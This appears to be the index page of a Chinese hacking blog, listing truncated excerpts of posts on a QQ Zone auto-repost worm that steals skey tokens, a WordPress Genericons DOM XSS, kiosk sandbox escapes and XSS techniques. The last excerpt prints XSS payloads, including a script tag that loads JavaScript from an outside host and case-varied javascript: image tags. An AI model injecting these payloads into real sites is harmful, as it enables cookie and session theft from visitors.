• 技术揭秘“QQ空间”自动转发不良信息

    技术揭秘“QQ空间”自动转发不良信息
    大家经常会看到QQ空间自动转发一些附带链接的不良信息,即便我们的QQ密码并没有被盗取。最近通过对一个QQ空间自动转发链接进行分析,发现该自动转发机制通过利用腾讯网站存在漏洞的页面,精心构造出利用代码获取用户的QQ号和skey值,从而获得用户的一些敏感操作权限。并通过该漏洞自动转发一些不良信息诱导用户点击,从而导致大面积传播。 传播现象 如果有一天,你发现好多Q...阅读全文
    作者:qxz_xp | 发布:2015年8月23日 | 分类:黑客技术, 黑客攻防 | 2条评论
    阅读全文

  • WordPress默认主题存在DOM XSS漏洞 影响百万用户

    WordPress默认主题存在DOM XSS漏洞 影响百万用户
    使用了Genericons包的WordPress插件或主题都可能受一个基于DOM的XSS漏洞影响,因为WordPress默认主题Twenty Fifteen及知名插件Jetpack都包含了存在漏洞的页面example.html,影响百万用户。 漏洞成因 任何使用了genericons包的WordPress插件或主题都会受到这个基于DOM的跨站脚本漏洞的影响,因为通常情况下genericons包中都含有一个example.html文件,而该文件中包含一个基...阅读全文
    作者:qxz_xp | 发布:2015年5月07日 | 分类:漏洞公布, 网络安全 | 1条评论
    阅读全文

  • 谈谈终端机与移动设备的沙盒安全

    谈谈终端机与移动设备的沙盒安全
    0×01 Background ziwen原创 转载请注明! 在我们每天生活的城市里随处都可见一个一个的移动终端或终端机。终端机一般由触控显示器和主机构成 比如银行的atm机 ktv的点歌机 联通营业厅的自助服务机。 而这些东西的安全性并不是很高 一般都是一个win或linux操作系统加一个沙盒构成 而我们要做的就是跳出这个沙盒 这个沙盒一旦跳出且我们的权限足够高 那么我们就可以做一些想做...阅读全文
    作者:qxz_xp | 发布:2014年8月14日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 浅谈新手寻找XSS时所存在的一些误区

    浅谈新手寻找XSS时所存在的一些误区
    1. 误区1: XSS,不是专门去“绕过”限制。 打个简单的比方,一个已经被层层把守的大门,面前荆棘无数,而你又单枪匹马的,怎么闯的进去? 这个时候你要意识到,走大门是不可能的。其实我们要突破的城防,有很多小门可以进去的,甚至不需要任何手段就可以直接走进去。我们为什么不走呢? XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,...阅读全文
    作者:qxz_xp | 发布:2014年4月12日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 77种网站XSS跨站攻击脚本语法

    77种网站XSS跨站攻击脚本语法
    XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码 当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 XSS分两类: 一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。 另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者...阅读全文
    作者:qxz_xp | 发布:2014年1月06日 | 分类:菜鸟入门, 黑客工具, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • xss跨站脚本攻击汇集

    xss跨站脚本攻击汇集
    xss跨站脚本攻击汇集 (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号)...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文